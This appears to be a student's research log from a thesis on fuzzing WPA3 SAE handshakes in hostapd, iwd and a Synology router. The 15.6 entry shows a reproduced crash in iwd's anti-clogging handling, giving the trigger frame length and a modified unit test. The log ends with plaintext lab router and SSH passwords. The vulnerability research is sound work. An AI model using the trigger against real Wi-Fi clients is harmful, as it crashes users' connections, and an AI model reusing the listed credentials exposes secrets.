### 5.6.2019

- why does dragonfuzz stop sometimes after sending the first commit-auth frame?
    - cannot find out when i cannot see the frames sent over the air.
- read this: https://netbeez.net/blog/station-authentication-association/
- implement correct association request frame
- how does such a frame look like??? check with wpa_supplicant!


### 6.6.2019

- properly implement printing of debugging messages [done]
- only resend auth-commit and auth-confirm when a timeout has been reached [done]
- Read this: https://medium.com/asecuritysite-when-bob-met-alice/wpa-3-dragonfly-out-of-the-frying-pan-and-into-the-fire-35240aef4376

### 8.6.2019

- handle confirm frame verification [done]
- try again to send an ack frame or assoc frame [done: is received now!]

### 9.6.2019
- implement deauthentication request [done]
- check that deauth actually is received! []
- implement first 3 fuzzing test cases [done]
- receive assoc reSponse frame [done]
- copy required params from beacon frame for assoc frame dynamically [done]
- what is the best fuzzing test case strategy???
    Make one fuzzing test and check if the process still lives, send deauth and start
    all over?
    + Read this article: https://blog.trailofbits.com/2019/01/22/fuzzing-an-api-with-deepstate-part-1/
    + check this out: https://github.com/trailofbits/deepstate


### 10.6.2019
- Implement fuzz all strategy. [done]
- compute number of average beacon reception [done: around 120ms]
- How can we check if the targeted access point had a failure?
    + it does not send beacons in the same average interval as before or stops sending alltogether
    + we can monitor the process if the AP process is on the same system

- implement way to run single fuzzing tests [done]

### 12.6.2019 [1h40min]

- when fuzzing is enabled, prevent retransmissions, because often the fuzzing tests revolve in a
  state where the AP will not respond.

- add fuzzing test to inject random anti-clogging token in the frame
- there might be something fishy with the password identifier (WLAN_EID_EXT_PASSWORD_IDENTIFIER):

    1. it can be located at the end of the frame, instead of the anti-clogging token or
     after the anti-clogging token

    2. we can manage to inject up to 254 arbitrary bytes as password identifier after the commit frame

    3. where is this password ident used? what purpose does it serve?

        static struct wpabuf * auth_build_sae_commit(struct hostapd_data *hapd,
                                 struct sta_info *sta, int update)
        {
            struct wpabuf *buf;
            const char *password = NULL;
            struct sae_password_entry *pw;
            const char *rx_id = NULL;

            if (sta->sae->tmp)
                rx_id = sta->sae->tmp->pw_id;

            for (pw = hapd->conf->sae_passwords; pw; pw = pw->next) {
                if (!is_broadcast_ether_addr(pw->peer_addr) &&
                    os_memcmp(pw->peer_addr, sta->addr, ETH_ALEN) != 0)
                    continue;
                if ((rx_id && !pw->identifier) || (!rx_id && pw->identifier))
                    continue;
                if (rx_id && pw->identifier &&
                    os_strcmp(rx_id, pw->identifier) != 0)
                    continue;
                password = pw->password;
                break;
            }


### 13.6.2019 [3h30min]

- are there already wpa3 routers avail?
    - Lancom offers routers with wpa3: https://www.lancom-systems.de/docs/LCOS/referenzhandbuch/topics/WPA3.html
    - https://www.lancom-systems.de/newsroom/presse/pressemitteilung/kostenloses-lancom-update-bringt-wpa3-fuer-mehr-wlan-sicherheit/
    - check here: https://wpa3.mathyvanhoef.com/
    - https://www.wi-fi.org/news-events/newsroom/wi-fi-alliance-security-update-april-2019

- Read from line 377 #ifdef CONFIG_SAE in file ieee802_11.c until the end. Look for interesting stuff and take rough notes here.


### 14.6.2019 [3h30min]

- Read this paper: https://papers.mathyvanhoef.com/asiaccs2017.pdf
- Read this paper: https://papers.mathyvanhoef.com/woot2018.pdf [done]

- check for potential integer overflows in iwd/src/sae.c that use size_t and subtract from a size_t variable

        static void sae_process_anti_clogging(struct sae_sm *sm, const uint8_t *ptr,
                            size_t len)
        {
            /*
             * IEEE 802.11-2016 - Section 12.4.6 Anti-clogging tokens
             *
             * It is suggested that an Anti-Clogging Token not exceed 256 octets
             */
            if (len > 256) {
                l_error("anti-clogging token size %zu too large, 256 max", len);
                return;
            }

            sm->token = l_memdup(ptr + 2, len - 2);
            sm->token_len = len - 2;
            sm->sync = 0;


        sm->token_len is a size_t variable. If the len is 0 or 1, sm->token_len will overlow!

        later sm->token_len is used in memcpy:

        	if (sm->token) {
        		memcpy(ptr, sm->token, sm->token_len);
        		ptr += sm->token_len;
        	}


        if (len < 4) {
            l_error("bad packet length");
            goto reject;
        }

        // len might be 4 and pass the above check!!!


        /*
         * TODO: Hostapd seems to not include the group number when rejecting
         * with an unsupported group, which violates the spec. This means our
         * len == 4, but we can still recover this connection by renegotiating
         * a new group. Because of this we need to special case this status
         * code, as well as add the check in the verify function to allow for
         * this missing group number.
         */
        if (len == 4 && L_LE16_TO_CPU(auth->status) !=
                    MMPDU_STATUS_CODE_UNSUPP_FINITE_CYCLIC_GROUP)
            goto reject;

        ret = sae_verify_packet(sm, L_LE16_TO_CPU(auth->transaction_sequence),
                        L_LE16_TO_CPU(auth->status),
                        auth->ies, len - 6); // 4 - 6 is also integer overflow!


        WE MUST ACHIEVE THAT len=7, such that after 7-6=1, and status commit the
        sae_process_anti_clogging() results in a integer overflow and the memcpy()
        function crashes.

        if len=7 feasible???

        also len -= sizeof(struct mmpdu_header); happens before

        so len must be 7 + sizeof(struct mmpdu_header);


        how to compile iwd?

        put iwd and put ell (git://git.kernel.org/pub/scm/libs/ell/ell.git) in the same directory,
        then issue the following commands:

        autoreconf -i
        ./configure --prefix=/usr --enable-hwsim --enable-tools
        make

        There are already many tests in: /home/nikolai/Master/Masterarbeit/build_iwd/iwd/unit/test-sae.c

        this is the test we are interested in test_clogging:

        	assert(auth_proto_rx_authenticate(ap, (uint8_t *)frame, len) ==
        						-EAGAIN);


        There is a very complete unit test in iwd/unit/test-sae.c that targets WPA3 SAE.

        we can modify this unit test and use hwsim to run various tests against the library!

        Use: modprobe mac80211_hwsim radios=0

        run test-sae unit test with:

        sudo ./test-runner --verbose iw,hwsim,hostapd,iwd -k /boot/vmlinuz-4.15.0-39-generic --unit-tests test-sae


### 15.6.2019 [5h]

    - Confirm vuln:

    sae_process_anti_clogging:

    	sm->token = l_memdup(ptr + 2, len - 2);
    	sm->token_len = len - 2;


    if len overflows, the l_memdup will probably fail and return NULL.
    token_len will be a huge integer.

    sae_build_commit:
        if (sm->token) {
            memcpy(ptr, sm->token, sm->token_len);
            ptr += sm->token_len;
        }

    if branch wont be taken because token is NULL, therefore no overflow with
    500 byte sized ptr unfortunately.

    But maybe a call to l_memdup with a huge number is enough for a crash???


    -- launch archbang via QEMU:

    sudo qemu-system-x86_64 -enable-kvm -hda BOOTSYSTEM.img -cdrom archbang-spring-0506-x86_64.iso -boot d -m 512


    - how to compile uni tests?

    via ./bootstrap-configure && make

    const struct mmpdu_header *mpdu_validate(const uint8_t *frame, int len)
    {
        const struct mpdu_fc *fc;
        const struct mmpdu_header *mmpdu;
        int offset;

        if (!frame)
            return NULL;

        if (len < 2)
            return NULL;

        offset = 2;
        fc = (const struct mpdu_fc *) frame;

        switch (fc->type) {
        case MPDU_TYPE_MANAGEMENT:
            mmpdu = (const struct mmpdu_header *) frame;

            if (validate_mgmt_mpdu(mmpdu, len, &offset))
                return mmpdu;

            return NULL;
        default:
            return NULL;
        }
    }


    vuln can be triggerd by modifiying this code in test_sae:

    a frame length of 35 passes all checks in iwd/src/mpdu.c

        - mpdu_validate
        - validate_authentication_mmpdu if (len < *offset + 6) {

    this means the function sae_process_anti_clogging() receives a frame length of 1
    and the code

    	sm->token = l_memdup(ptr + 2, len - 2);
    	sm->token_len = len - 2;
    	sm->sync = 0;

    will lead to an abort() in l_malloc() because the size becomes -1
    abort() will terminate the program and thus also the wifi station/client

    this means whenever a client tries to authenticate via SAE with anti-clogging tokens set,
    the client deamon will crash.

    static void test_clogging(const void *arg)
    {
        struct test_data *td = l_new(struct test_data, 1);
        struct auth_proto *ap = test_initialize(td);
        struct authenticate_frame *frame = alloca(
                        sizeof(struct authenticate_frame) + 34);
        uint8_t extra[34];
        size_t len;

        l_put_le16(19, extra);
        memcpy(extra + 2, td->test_clogging_token, 32);

        len = setup_auth_frame(frame, aa, 1,
                    MMPDU_STATUS_CODE_ANTI_CLOGGING_TOKEN_REQ,
                    NULL, sizeof(extra));

        td->test_anti_clogging = true;
        td->commit_success = false;

        printf("commit frame length = %lu, sizeof mmpdu_header = %lu\n", len, sizeof(struct mmpdu_header));

        len = 35;

        assert(auth_proto_rx_authenticate(ap, (uint8_t *)frame, len) ==
                            -EAGAIN);

        assert(td->commit_success == true);

        test_deanti-cloggingstruct(td);
        auth_proto_free(ap);
    }

    TEST: SAE anti-clogging
    commit frame length = 68, sizeof mmpdu_header = 28
    is mgmt
    Frame length in sae_rx_authenticate(): 35
    Frame length after sizeof(struct mmpdu_header): 7
    sae_verify_packet() Frame length: 1
    sae_process_anti_clogging() reached with length 1
    ell/util.c:67:l_malloc(): failed to allocate -1 bytes
    Aborted (core dumped)


    - write fuzzer code that fuzzes auth commit frames with different status codes and increases the length of each frame
    up to 265 bytes + auth header
        - get all possible frames from here: iwd/src/mpdu.c validate_mgmt_mpdu
        - and especially here: validate_authentication_mmpdu


    - Read this to get started with IWD: https://iwd.wiki.kernel.org/gettingstarted


### 16.6.2019 [5h]

    - See if there is a state problem with retrying with new groups in wpa_supplicant
      and renegotation of new group ids.

    - make a state machine model of the most important frames in the SAE supplicant authenticator case in iwd
        - make a table first [done]

    - make a state machine of all possible errorneous states in the SAE supplicant authetnicator case

    - create a illustration of an auth commit frame and an auth confirm frame
        - show all possible values for all relevant fields

    - Read technical comments from ieee: https://mentor.ieee.org/802.11/documents?is_dcn=sae [done]

    - what version of wpa_supplicant does Android use????
        - check this out: https://android.googlesource.com/platform/external/wpa_supplicant_8/+/040d17d5d835cc4653e47b120e40975fc37fce95%5E%21/#F0

    - what client side wifi implementation does os X use?

    - see how openwrt implements SAE?
        - https://github.com/openwrt/openwrt/commit/8f17c019a19f1d0a50e649e81dab9d8f74ad7efb
        - Check the patches here: https://github.com/openwrt/openwrt/tree/master/package/network/services/hostapd/patches
        https://github.com/openwrt/openwrt

### 17.6.2019
    - Understand this: https://github.com/openwrt/openwrt/blob/master/package/network/services/hostapd/patches/063-0010-SAE-Fix-confirm-message-validation-in-error-cases.patch
    - Check the SAE vulns here: https://github.com/openwrt/openwrt/tree/master/package/network/services/hostapd/patches
    - Read this: https://github.com/openwrt/openwrt/commit/af606d077f3cc175a39bfffc84cc615e0d3bf336



### 20.6.2019

    - create a fuzzing test that sends anti-clogging token auth-commit frames with variable length of the
        anti-clogging token [done]

    - create fuzzing test that fuzzes password identifier

    - fix the position of anti-clogging token in table 2


### 21.6.2019
    - Make chapter "laboratory setup" ready [done]

    - read intro again [done]
    - update chapter objectives [done]

    - shorten related work about dragonblood
    - shorten cryptographic introduction

    - make pretty graphic in SAE Handshake
    - READ: Fuzzing Wi-Fi Drivers to Locate Security Vulnerabilities 1


### 25.6.2019

    - do not immediately send the confirm frame upon reception of the auth-commit frame from synology


### 15.7.2019 [4h20min]

try again to attack the synology router with the current setup
    - increase loglevel on synology router if possible [done]
    - see if we get a complete handshake with the correct password [done: no, we only get the commit frame]
    - check if we also receive the confirm frame by listening for it [done: no we do not receive the commit + confirm frame in
    one batch, we only receive the auth commit frame).

    - see if wpa_supplicant receives the confirm frame [done: yes SAE handshake completes, 4way fails]

    learned: client sends commit, authenticator replies with commit, client sends confirm, authenticator replies
    with confirm. no infrastructure mode.

    - why is our confirm frame never displayed on synology router? [done]
        - possible reasons: Invalid confirm frame contents:
        check auth_alg=3 auth_transaction=2 status_code=0 wep=0 seq_ctrl=0x1480

        REASON: the fucking sequence number in the ieee 802.11 header was wrong
        now: auth commit has seq=1, auth confirm has seq=2, works now

    - confirm token could not be verified because we did not use the send confirm number
    from the peer. works now [done]

    - see what happens when we run the tests
        - often we get ignored. probably a limit per MAC address
        - randomize MAC address then
            - when randomzing mac addresses, we get: "no more room for new STAs"
                1/1 02:02:20   New STA
                1/1 02:02:20 no more room for new STAs (128/128)
                1/1 02:02:20 authentication reply: STA=b6:7d:60:89:f5:0c auth_alg=3 auth_transaction=2 resp=17 (IE len=0)
                1/1 02:02:20 atheros_send_mgmt frmlen = 30 b6:7d:60:89:f5:0c
                1/1 02:02:20 Custom wireless event: 'Manage.auth 348 freq=2412'
                1/1 02:02:20 freq=2412


### 16.7.2019 [5h15min]


## TODO!!!
- Read this: http://www.mathyvanhoef.com/2013/02/understanding-heap-exploiting-heap.html
- Read this: https://papers.mathyvanhoef.com/opcde2019.pdf
- Read this: https://www.freecodecamp.org/news/state-machines-basics-of-computer-science-d42855debc66/


## Notes

All SAE auth management is done in /home/nikolai/Master/Masterarbeit/wpa_supplicant-2.8/wpa_supplicant/sme.c !!!
This can be compared to iwd from intel


synology router setup

user: niko
pass: letmein1234

wpa3 pass: letmein1234


ssh admin@192.168.1.1
password: synology

ssh root@192.168.1.1
password: synology